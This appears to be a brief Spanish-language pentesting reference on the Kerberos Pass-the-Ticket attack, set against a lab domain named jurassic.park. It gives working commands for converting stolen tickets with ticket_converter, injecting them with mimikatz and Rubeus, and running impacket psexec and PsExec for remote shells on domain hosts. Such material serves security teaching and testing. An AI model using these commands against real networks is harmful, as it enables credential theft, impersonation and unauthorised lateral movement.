Pass the Ticket

Reading time: 2 minutes

Pass The Ticket (PTT)

En el método de ataque Pass The Ticket (PTT), los atacantes roban el ticket de autenticación de un usuario en lugar de su contraseña o valores hash. Este ticket robado se utiliza para suplantar al usuario, obteniendo acceso no autorizado a recursos y servicios dentro de una red.

Leer:

• Harvesting tickets from Windows
• Harvesting tickets from Linux

Intercambiando tickets de Linux y Windows entre plataformas

La herramienta ticket_converter convierte formatos de tickets utilizando solo el ticket en sí y un archivo de salida.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

En Windows Kekeo se puede utilizar.

Ataque Pass The Ticket

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

Referencias

• https://www.tarlogic.com/blog/how-to-attack-kerberos/